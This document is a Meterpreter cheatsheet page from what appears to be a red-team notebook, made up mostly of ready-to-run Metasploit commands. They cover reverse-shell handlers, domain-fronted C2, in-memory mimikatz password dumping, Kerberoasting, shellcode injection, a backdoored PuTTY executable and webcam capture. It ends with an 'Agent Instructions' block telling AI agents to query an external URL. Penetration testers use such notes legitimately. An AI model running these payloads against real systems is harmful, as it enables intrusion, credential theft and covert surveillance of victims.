# Meterpreter

* <https://buffered.io/posts/staged-vs-stageless-handlers/>
* <https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/>
* <https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation>
* <https://xakep.ru/2020/07/03/metasploit-guide/>
* <https://diablohorn.com/2013/02/21/we-bypassed-antivirus-how-about-idsips/>
* <https://redops.at/en/blog/meterpreter-vs-modern-edrs-in-2023>

## Cheatsheet

Quick handler launch:

```
msf > handler -H eth0 -P 443 -p windows/x64/meterpreter/reverse_https [-e x64/xor] [-x]
```

Bind RC4 payload & handler through SOCKS proxy:

```
$ msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 RHOST=10.10.13.37 LPORT=443 RC4PASSWORD='Passw0rd!' -f exe -o rev.exe
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp_rc4
msf exploit(multi/handler) > set RHOST 192.168.1.11
msf exploit(multi/handler) > set LPORT 443
msf exploit(multi/handler) > set RC4PASSWORD Passw0rd!
msf exploit(multi/handler) > set PROXIES socks5:127.0.0.1:1080
msf exploit(multi/handler) > run
```

Generate a custom SSL certificate for encrypting C2 communications:

```
$ openssl req -batch -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout cert.key -out cert.crt
$ cat cert.key cert.crt > cert.pem
$ msfvenom -p ... HandlerSSLCert=./cert.pem StagerVerifySSLCert=true ...
msf exploit(multi/handler) > set HandlerSSLCert /home/snovvcrash/cert.pem
msf exploit(multi/handler) > set StagerVerifySSLCert true
```

Automation (about `exploit` flags [here](https://github.com/rapid7/metasploit-framework/blob/4049c41ac1b6f12566b055dc5442192072ea5d78/lib/msf/ui/console/command_dispatcher/exploit.rb#L17-L27)):

{% code title="auto.rc" %}

```
// sudo msfconsole -qr auto.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_winhttps
set LHOST 10.10.13.37
set LPORT 443
set EXITFUNC thread
set StageEncoder x64/zutto_dekiru
set EnableStageEncoding true
set HandlerSSLCert /home/snovvcrash/cert.pem
set StagerVerifySSLCert true
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -jz
```

{% endcode %}

Start SOCKS server (default is SOCKS5):

```
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j
```

Handle connections with **domain fronting**:

```
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=legitimate.com LPORT=443 HttpHostHeader=cdn.provider.net -f exe -o https.exe
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST legitimate.com
msf exploit(multi/handler) > set OverrideLHOST legitimate.com
msf exploit(multi/handler) > set OverrideRequestHost true
msf exploit(multi/handler) > set HttpHostHeader cdn.provider.net
msf exploit(multi/handler) > run
```

Migrate to a different architecture:

```
msf > use post/windows/manage/archmigrate
msf post(windows/manage/archmigrate) > set SESSION 1
msf post(windows/manage/archmigrate) > run
```

Switch to the next [transport](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control) killing current session:

```
meterpreter > transport add -t reverse_tcp -l 10.10.13.37 -p 9002
meterpreter > transport list
msf > handler -H eth0 -P 9002 -p windows/x64/meterpreter/reverse_tcp
meterpreter > transport next
```

Reverse local port `3389` (on Victim, `192.168.1.11`) to local port `43389` (on Attacker):

```
meterpreter > portfwd add -l 43389 -p 3389 -r 192.168.1.11
[*] Local TCP relay created: :43389 <-> 192.168.1.11:3389
$ xfreerdp /u:administrator /p:'Passw0rd!' /v:127.0.0.1:43389
```

Routing:

```
meterpreter > run autoroute -s 192.168.10.0/24
meterpreter > run autoroute -p
Or
msf5 > route add 192.168.10.0/24 1
msf5 > route
```

Execute binary from memory:

```
meterpreter > execute -cimH -d calc.exe -f /home/snovvcrash/www/mimikatz.exe -a '"sekurlsa::logonPasswords full" "exit"'
```

[Execute](https://github.com/b4rtik/metasploit-execute-assembly) .NET assembly from memory:

```
msf > use post/windows/manage/execute_dotnet_assembly
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/Rubues.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS "kerberoast /usetgtdeleg /format:hashcat"
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > run
```

Inject shellcode:

```
msf > use post/windows/manage/shellcode_inject
msf post(windows/manage/shellcode_inject) > set SHELLCODE /home/snovvcrash/www/shellcode.bin
msf post(windows/manage/shellcode_inject) > set SESSION 1
msf post(windows/manage/shellcode_inject) > run
```

Backdoored legit executable with delayed Stdapi loading:

```
$ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8080 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe
$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8080; set AutoLoadStdapi false; set EXITFUNC thread; run'
meterpreter > use unhook
meterpreter > load stdapi
```

Quicky opsec traffic build template:

```bash
sudo certbot certonly --standalone -d $DOMAIN --register-unsafely-without-email --agree-tos --key-type rsa
sudo cat /etc/letsencrypt/live/$DOMAIN/{privkey.pem,cert.pem} > /tmp/cert.pem

msfvenom -p windows/x64/meterpreter_reverse_https AutoLoadStdapi='false' AutoSystemInfo='false' HandlerSSLCert='/tmp/cert.pem' HttpCookie='...' HttpReferer='https://www.microsoft.com/en-us/' HttpServerName='nginx' HttpUnknownRequestResponse='...' HttpUserAgent='Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko' StagerVerifySSLCert='true' LHOST='...' LPORT='443' LURI='...' -f raw -o /tmp/met.bin
```

Get web camera capture:

```
meterpreter > webcam_list
meterpreter > webcam_snap [-i <CAMERA_ID>]
meterpreter > webcam_stream
```

## Debug

* <https://github.com/deivid-rodriguez/pry-byebug>

{% embed url="<https://youtu.be/QzP5nUEhZeg?t=2190>" %}

```
$ gem install pry-byebug
$ vi ~/.pry-byebug
```

{% code title="pry-byebug" %}

```ruby
if defined?(PryByebug)
  Pry.commands.alias_command 'c', 'continue'
  Pry.commands.alias_command 's', 'step'
  Pry.commands.alias_command 'n', 'next'
  Pry.commands.alias_command 'f', 'finish'
end

 # Hit Enter to repeat last command
Pry::Commands.command /^$/, "repeat last command" do
  _pry_.run_command Pry.history.to_a.last
end
```

{% endcode %}

```
$ cp -r /usr/share/metasploit-framework/ /opt
$ vi /opt/metasploit-framework/msfconsole
...add "require 'pry-byebug'"...
$ mkdir -p ~/.msf4/modules/exploits/linux/http/
$ cp /usr/share/metasploit-framework/modules/exploits/linux/http/packageup.rb ~/.msf4/modules/exploits/linux/http/p.rb
$ vi ~/.msf4/modules/exploits/linux/http/p.rb
...add "binding.pry"...
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/c2/meterpreter.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.